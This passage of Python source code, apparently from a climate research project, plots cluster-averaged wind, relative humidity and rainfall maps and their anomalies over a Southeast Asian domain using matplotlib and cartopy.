ax_qp.set_xticks([w,e], crs=ccrs.PlateCarree())
ax_qp.set_xticklabels([w,e], rotation=55)
ax_qp.xaxis.tick_top()
else: ax_qp.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_qp.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
else: ax_qp.set_yticks([])
if cluster == 0: # title
ax_qp.set_title(f"Pressure: {pressure} hPa,\ncluster no.{cluster+1}", loc='left')
else: ax_qp.set_title(f"cluster no.{cluster+1}", loc='left')
time.sleep(1); gc.collect()
wndspd = np.hypot(vwnd_gridded_centroids, uwnd_gridded_centroids)
time.sleep(1); gc.collect()
# unit vectors: direction from the quiver, magnitude from the filled contours
u = uwnd_gridded_centroids/wndspd
v = vwnd_gridded_centroids/wndspd
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='aqua')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
time.sleep(1); gc.collect()
if cluster == model.cbar_pos: # cbar
axins_qp = inset_axes(ax_qp, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_qp.transAxes)
cbar_qp = fig.colorbar(spd_plot, cax=axins_qp, label='Wind speed (m/s)', orientation='horizontal',pad=0.01)
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
print(f"=> Quiver plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_qp_sgonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nQuiver plotting took {utils.time_since(quiverstarttime)}.\n\n")
def print_rhum_plots(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hPa,\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(model.X, model.Y, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_v3-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_rhum_plots_sgonly(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM plots...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_sg = 101
e_lim_sg = 107
s_lim_sg = -1
n_lim_sg = 4
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(
lon=slice(w_lim_sg, e_lim_sg),lat=slice(n_lim_sg, s_lim_sg))
w = 102
e = 105
s = 0.5
n = 2
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
for cluster in range(optimal_k):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
# ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rhum.set_extent([w, e, s, n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks([w,e], crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels([w,e], rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"Pressure: {pressure} hPa,\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(target_ds_withClusterLabels.lon, target_ds_withClusterLabels.lat, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity (%)', orientation='horizontal', pad=0.01);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"{utils.time_now()} - clus {cluster}")
print(f"==> Rhum plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_sgonly-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM: {utils.time_since(rhumstarttime)}.")
def print_RHUM_ANOM_whole(model, dest, optimal_k):
rhumstarttime = timer(); print(f"{utils.time_now()} - Finishing RHUM ANOMALY plots (whole)...")
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
lon = target_ds_withClusterLabels.lon
lat = target_ds_withClusterLabels.lat
w = lon.min().data
e = lon.max().data
s = lat.min().data
n = lat.max().data
levels = [int(i) for i in np.linspace(-40,40,24)]
for idx, pressure in enumerate(model.rhum_pressure_levels):
fig, gs_rhum = create_multisubplot_axes(optimal_k)
baseline = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
for cluster in range(optimal_k):
print(f"{utils.time_now()} - clus {cluster}")
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).where(
target_ds_withClusterLabels.cluster==cluster, drop=True).rhum.mean("time")
# anomaly = cluster mean minus the whole-period baseline (sign convention matches the quiver ANOM plots)
mean = rhum_gridded_centroids - baseline
ax_rhum = fig.add_subplot(gs_rhum[cluster], projection=ccrs.PlateCarree())
ax_rhum.xaxis.set_major_formatter(model.lon_formatter)
ax_rhum.yaxis.set_major_formatter(model.lat_formatter)
ax_rhum.coastlines("50m", linewidth=.7, color='k')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='k')
ax_rhum.set_extent([w,e,s,n])
if cluster < model.grid_width: # top ticks
ax_rhum.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_rhum.set_xticklabels(np.linspace(w,e, 5), rotation=55)
ax_rhum.xaxis.tick_top()
else: ax_rhum.set_xticks([])
if cluster % model.grid_width == model.grid_width-1: # right-side ticks
ax_rhum.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
else: ax_rhum.set_yticks([])
if cluster == 0: # title
ax_rhum.set_title(f"RHUM anomaly @ {pressure} hPa, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\ncluster no.{cluster+1}", loc='left')
else: ax_rhum.set_title(f"cluster no.{cluster+1}", loc='left')
Rhum = ax_rhum.contourf(lon, lat, mean,
levels, cmap='BrBG', extend='both')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
if cluster == model.cbar_pos: # cbar
axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity anomaly (%)', orientation='horizontal', pad=0.01,
ticks = levels);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
print(f"==> Rhum ANOMALY plots plotted for {pressure} hPa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_v5_ANOM-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
print(f"\n\nTime taken to plot RHUM ANOMALIES for whole: {utils.time_since(rhumstarttime)}.")
def print_ind_clus_proportion_above_90thpercentile(model, dest, clus):
print(f'{utils.time_now()} - Generating >90th percentile RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
RFprec_to_ClusterLabels_dataset_vals = utils.open_pickle(f'{model.full_rf_5Xcoarsened_vals_path}')
percen90 = np.percentile(RFprec_to_ClusterLabels_dataset_vals, 90, axis=0)
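# boolean per day and grid cell: did the coarsened cluster RF exceed the full model's gridwise 90th percentile?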
compared_clus_to_90percent = (coarsened_clus_rf_ds > percen90).values
time_averaged_gridwise_RF_of_cluster_compared_to_90pcent = np.mean(compared_clus_to_90percent, axis=0)*100
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more RF \nthan the 90th percentile value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_90percent.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_90pcent.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF that exceeds 90th percentile of corresponding grid within full model (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_90thpercentile_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_under_10thpercentile(model, dest, clus):
print(f'{utils.time_now()} - Generating <10th percentile RF plot for clus: {clus+1}')
mean = get_RF_calculations(model, criteria='10perc', clus=clus)
baseline = get_RF_calculations(model, criteria='10perc', calculation='10perc', clus="whole")
compared_clus_to_10percent = mean < baseline
time_averaged_gridwise_RF_of_cluster_compared_to_10pcent = np.mean(compared_clus_to_10percent, axis=0)*100
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig = plt.Figure(figsize=(10,10))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving less RF \nthan the 10th percentile value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_10percent.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_10pcent.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF that falls below the 10th percentile of corresponding grid within full model (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_under_10thpercentile_cluster_v2_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_above_fullmodel_mean(model, dest, clus):
print(f'{utils.time_now()} - Generating > mean RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
RFprec_to_ClusterLabels_dataset_vals = utils.open_pickle(f'{model.full_rf_5Xcoarsened_vals_path}')
gridmean = np.mean(RFprec_to_ClusterLabels_dataset_vals, axis=0)
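# boolean per day and grid cell: did the coarsened cluster RF exceed the full model's gridwise mean?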
compared_clus_to_gridmean = (coarsened_clus_rf_ds > gridmean).values
time_averaged_gridwise_RF_of_cluster_compared_to_gridmean = np.mean(compared_clus_to_gridmean, axis=0)*100
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more RF \nthan the mean RF value of corresponding grid within full model",
fontweight='bold', fontsize=15, y=.95, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_gridmean.shape[0]}", fontsize=14, y=1.03)
ax.set_facecolor('w')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_gridmean.T,
np.linspace(0,100,51),
alpha=1,
cmap=terrain_map,
extend='max')
conts = ax.contour(RF, 'w', linewidths=.1)
ax.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=8)
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving RF above full model\'s grid-mean (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,100,10))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_fullmodel_mean_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_ind_clus_proportion_above_250mm(model, dest, clus):
print(f'{utils.time_now()} - Generating > 250mm RF plot for clus: {clus+1}')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
coarsened_clus_rf_ds = RFprec_to_ClusterLabels_dataset.precipitationCal.where(
RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).coarsen(lat=5, lon=5, boundary='trim').max()
compared_clus_to_250mm = (coarsened_clus_rf_ds > 250).values
time_averaged_gridwise_RF_of_cluster_compared_to_250mm = np.mean(compared_clus_to_250mm, axis=0)*100
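# mask cells where no day exceeded 250 mm, so 0% regions show as the silver background instead of the lowest color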
time_averaged_gridwise_RF_of_cluster_compared_to_250mm = np.ma.masked_where(time_averaged_gridwise_RF_of_cluster_compared_to_250mm==0, time_averaged_gridwise_RF_of_cluster_compared_to_250mm)
rf_ds_lon = coarsened_clus_rf_ds.lon
rf_ds_lat = coarsened_clus_rf_ds.lat
fig = plt.Figure(figsize=(12,15))
ax = fig.add_subplot(111, projection=ccrs.PlateCarree())
fig.suptitle(f"Proportion of cluster {int(clus+1)} grid members receiving more than 250mm of RF in a day.",
fontweight='bold', fontsize=14, y=.97, ha='center')
ax.set_title(f"Total dates for each grid in this cluster: {compared_clus_to_250mm.shape[0]}\n"
"Note that all regions in grey have 0% of the grid members with >250mm of RF.", fontsize=13, y=1.04)
ax.set_facecolor('silver')
ax.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax.coastlines("50m", linewidth=.8, color='lightseagreen', alpha=1)
ax.add_feature(cf.BORDERS, linewidth=.5, color='lightseagreen', linestyle='dashed')
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', np.vstack(plt.cm.CMRmap(np.linspace(1,0,12))))
RF = ax.contourf(rf_ds_lon, rf_ds_lat,
time_averaged_gridwise_RF_of_cluster_compared_to_250mm.T,
np.linspace(0,20,11),
alpha=1,
cmap=terrain_map,
extend='max')
cbar_rf = fig.colorbar(RF, label='Proportion of grid members receiving >250mm (%)', orientation='horizontal', \
pad=0.05, shrink=.8, ticks=np.arange(0,21,1))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
ax.set_xticks(np.round(np.linspace(model.LON_W, model.LON_E, 10)), crs=ccrs.PlateCarree())
ax.xaxis.tick_top()
ax.set_xlabel('')
ax.set_yticks(np.round(np.linspace(model.LAT_S, model.LAT_N, 10)), crs=ccrs.PlateCarree())
ax.yaxis.set_label_position("right")
ax.yaxis.tick_right()
ax.set_ylabel('')
fn = f"{dest}/RF_proportion_above_250mm_cluster_{int(clus+1)}.png"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def get_domain_geometry(model, dest):
lat_s_lim, lat_n_lim, lon_w_lim, lon_e_lim = model.domain_limits
plt.figure(figsize=(8,10))
ax = plt.subplot(111, projection=ccrs.PlateCarree())
ax.xaxis.set_major_formatter(model.lon_formatter)
ax.yaxis.set_major_formatter(model.lat_formatter)
ax.set_extent([lon_w_lim, lon_e_lim, lat_s_lim, lat_n_lim])
ax.set_title(f'Map extent: longitudes {model.LON_W} to {model.LON_E}E, latitudes {model.LAT_S} to {model.LAT_N}N')
geom = geometry.box(minx=model.LON_W, maxx=model.LON_E, miny=model.LAT_S, maxy=model.LAT_N)
ax.add_geometries([geom], ccrs.PlateCarree(), alpha=0.3)
ax.set_facecolor('silver')
ax.add_feature(cf.LAND, facecolor='white')
ax.coastlines('110m')
ax.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax.set_yticks(np.linspace(lat_s_lim, lat_n_lim, 5), crs=ccrs.PlateCarree())
ax.set_xticks(np.linspace(lon_w_lim, lon_e_lim, 6), crs=ccrs.PlateCarree())
fn = f'{dest}/extent_{model.dir_str}.png'
plt.savefig(fn)
print(f'Extent saved @:\n{fn}')
plt.close('all')
def print_rf_rainday_gt1mm_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM of proba of >1mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
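# Baseline: whole-dataset probability (%) that each grid cell records a wet day (>1mm).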
baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 1, axis=0) * 100
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 1mm, over region: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E\n', fontweight='bold')
levels = [int(i) for i in np.linspace(-100,100,21)]
for clus in range(optimal_k):
time.sleep(1); gc.collect()
data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
mean = np.mean(data > 1, axis=0)*100
mean = mean-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('k')
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks(np.linspace(model.LON_W,model.LON_E,10), crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([int(i) for i in np.linspace(model.LON_W,model.LON_E,10)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([int(i) for i in np.linspace(model.LAT_S,model.LAT_N,10)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts, conts.levels, colors='w', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01, ticks=np.arange(-100,101,20))
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
print(f'\n{utils.time_now()}: {clus}.. ');
print(f"\n -- Time taken is {utils.time_since(rfstarttime)}\n")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_ANOM_v1_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_rf_heavy_gt50mm_ANOM_plots(model, dest, optimal_k):
"""
i.e. taking the values but subtracting the baseline
"""
rfstarttime = timer(); print(f'{utils.time_now()} - Plotting ANOM (v2) proba of >50mm rainfall now.\nTotal of {optimal_k} clusters, now printing cluster: ')
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon')
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat')
